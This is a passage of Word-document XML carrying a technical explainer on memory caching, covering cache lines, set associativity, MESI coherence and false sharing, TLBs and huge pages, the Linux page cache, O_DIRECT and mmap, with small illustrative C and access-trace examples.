    <w:p w14:paraId="1BBFEE2D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache line mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D20ECC5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Data is transferred between memory hierarchy levels in </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cache lines</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — fixed-size blocks, universally 64 bytes on modern x86/ARM processors. When a single byte is accessed from DRAM, the entire 64-byte cache line containing it is loaded into L1/L2/L3 cache. Subsequent accesses to any byte within that same cache line are served from cache at ~1ns, not ~60ns from DRAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632812C9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spatial locality exploitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> If your data structure accesses sequential memory locations (arrays, structs with related fields together), each cache line load benefits 8–16 consecutive accesses. If your data structure accesses scattered memory locations (linked lists, trees with pointer chasing), each access is a cache miss — a new 64-byte cache line loaded for each node, even if you only use 8 bytes of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1365A554" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D84481B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Array traversal (cache-friendly):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CEFD51" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  arr[0]: cache miss → loads arr[0..7] (64 bytes = 8 int64s) into cache line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD8C72C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  arr[1]: cache hit (same cache line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205DA60C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  arr[2]: cache hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B7E3A4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4D6C9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  arr[7]: cache hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED08614" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  arr[8]: cache miss → loads arr[8..15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B49BCA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC95041" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Miss rate: 1/8 = 12.5%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1518861D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="68DDB85C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Linked list traversal (cache-hostile):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF6999C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  node0-&gt;data: cache miss → loads node0's cache line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6FB6A3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  node0-&gt;next: pointer to node1 (likely in a completely different cache line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BE5133" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  node1-&gt;data: cache miss → loads node1's cache line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3DDE07" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  node1-&gt;next: pointer to node2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7B9DD7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04631F25" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE8057" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Miss rate: ~100% (each node is in a different cache line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667E88C2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The practical performance difference:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> A sequential array scan versus a linked list traversal of the same N elements can differ by </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10–100×</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> purely due to cache behavior. This is why column-oriented databases (Parquet, ORC, ClickHouse's native format) dramatically outperform row-oriented formats for analytical queries — reading one column from 1 million rows requires sequential reads of one continuous memory region (maximally cache-friendly), whereas a row-oriented scan reads all columns interleaved (wastes cache lines on data that isn't needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F515DAF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache set associativity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83C8EF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>CPU caches are </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N-way set associative</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — the cache is divided into sets, each containing N slots (ways). A given memory address can only be stored in one specific set (determined by the address bits), but in any of the N ways within that set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC041CE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A95287" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>8-way set associative L1 cache (64KB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CFE4F3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  64KB / 64 bytes per line = 1024 cache lines total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F2B4C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  1024 / 8 ways = 128 sets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427CE78A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB664F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Address mapping: set_index = (address &gt;&gt; 6) &amp; 0x7F  (7 bits for 128 sets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3220C1FC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBEBFDB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  A memory address always maps to one specific set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D31033" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  That set has 8 slots — can hold 8 different cache lines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01212DA0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  If a 9th cache line maps to the same set, one must be evicted (LRU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E01655" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache thrashing from unfortunate access patterns:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> If your program accesses memory addresses that all map to the same cache set (addresses differing by a multiple of cache_size / associativity), those addresses compete for the same N slots and evict each other constantly. An 8-way set associative cache with 128 sets: addresses differing by multiples of 8KB all map to the same sets. Accessing an array with stride 8KB (or any </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>multiple) causes extreme set conflicts. This is why power-of-two dimension matrices have poor cache performance in certain access patterns — matrix rows of 4096 or 8192 doubles all conflict with each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5B875" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The MESI cache coherence protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42565E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>In multi-core processors, each core has its own L1/L2 cache. If Core 0 writes to an address cached by both Core 0 and Core 1, Core 1's cache line must be invalidated — otherwise Core 1 reads stale data. MESI (Modified, Exclusive, Shared, Invalid) is the protocol that maintains coherence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF82345" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modified:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> This core has the only valid copy, and it's been written (dirty). Must write back to memory before another core can read it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406E0713" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exclusive:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> This core has the only copy, unmodified. Can transition to Modified on write without notification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58124B3A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shared:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Multiple cores have valid copies. Must transition to Invalid on write (invalidate other copies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DCDC6A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1352"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Invalid:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Cache line is not valid — must fetch from memory or another core's cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400C15F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>False sharing — the correctness-correct but performance-catastrophic pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0744CF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Two variables on the same cache line, written by different cores simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE7973B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1B123" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>struct Counters {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E156B8D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    int64_t core0_count;  // bytes 0-7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CBBFEA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    int64_t core1_count;  // bytes 8-15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E369F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    // Both fit in one 64-byte cache line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D23799" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ABA726" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="223829FC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Core 0 writes core0_count → cache line transitions to Modified on Core 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF5F78" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">                           → Core 1's copy transitions to Invalid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EE5DE7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Core 1 writes core1_count → must fetch the cache line from Core 0's L1 cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0495428F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">                           → cache line transitions to Modified on Core 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27210B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                           → Core 0's copy transitions to Invalid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B8C93" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Core 0 writes core0_count → must fetch again from Core 1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBC9454" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>This ping-pong of cache line ownership between cores, each write invalidating the other core's cache, can reduce performance by </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10–100×</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> compared to using separate cache lines. Fix: pad each variable to its own cache line with __attribute__((aligned(64))) or alignas(64) in C/C++, or Java's @Contended annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33934BCF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLB (Translation Lookaside Buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D01041" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The TLB is a hardware cache for </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>page table entries</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — mappings from virtual addresses to physical addresses. Every memory access requires address translation (virtual → physical). Without the TLB, every memory access would require 3–5 additional memory accesses to walk the page table — catastrophic performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C4F1A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLB miss cost:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> ~100 cycles on modern processors for a TLB miss that requires page table walk. At ~3GHz, that's ~33ns per miss. High TLB miss rates (common with large working sets, sparse memory access, large allocations with poor spatial locality) can dramatically degrade performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4368D8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Huge pages (2MB or 1GB pages instead of 4KB):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> A single TLB entry covers 2MB instead of 4KB → 512× more coverage per TLB entry → dramatically reduced TLB miss rates for large, continuous memory regions. Databases (PostgreSQL, Oracle), JVMs, and Redis use huge pages explicitly for their large memory pools. Linux transparent huge pages (THP) enables this automatically but with variable overhead from compaction; explicit huge page allocation is more predictable for latency-sensitive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119FC7C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Page Cache — OS-Level File Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF80EF7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The Linux kernel maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>page cache</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — a cache of recently accessed file system pages (disk blocks) in DRAM. When a file is read, the kernel reads it into the page cache. Subsequent reads of the same file data come from the page cache (DRAM speed) rather than disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0363057B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The page cache is the most important cache most developers never think about:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D5FAF5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>A PostgreSQL database with 100GB of data on NVMe SSD and 128GB of RAM effectively caches the entire database in the page cache. Queries that touch the same data repeatedly operate at DRAM speed (~60ns per page access) rather than NVMe speed (~100µs). The database's own buffer pool (PostgreSQL's shared_buffers) is an additional application-level cache — for PostgreSQL, the page cache often serves as the primary cache for data not in shared_buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1409301F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>O_DIRECT — bypassing the page cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F87C1B2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Databases that manage their own buffer pools (MySQL InnoDB, Oracle, SQL Server) often open files with O_DIRECT to bypass the OS page cache. Reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561E987D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>The database manages its own cache (buffer pool) — double caching wastes memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCD08B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>The database knows its access patterns better than the OS (which uses a generic LRU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42695C3B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1353"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Direct I/O gives the database control over I/O scheduling and buffer management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F042776" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mmap — treating files as memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6AC684" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>mmap() maps file pages directly into the process's virtual address space. Accesses to the mapped region trigger page faults on first access (OS loads the page from disk into the page cache and maps it into the process's address space). Subsequent accesses are direct memory accesses — no read() system call overhead, no kernel-to-userspace copy.</w:t>
      </w:r>
    </w:p>
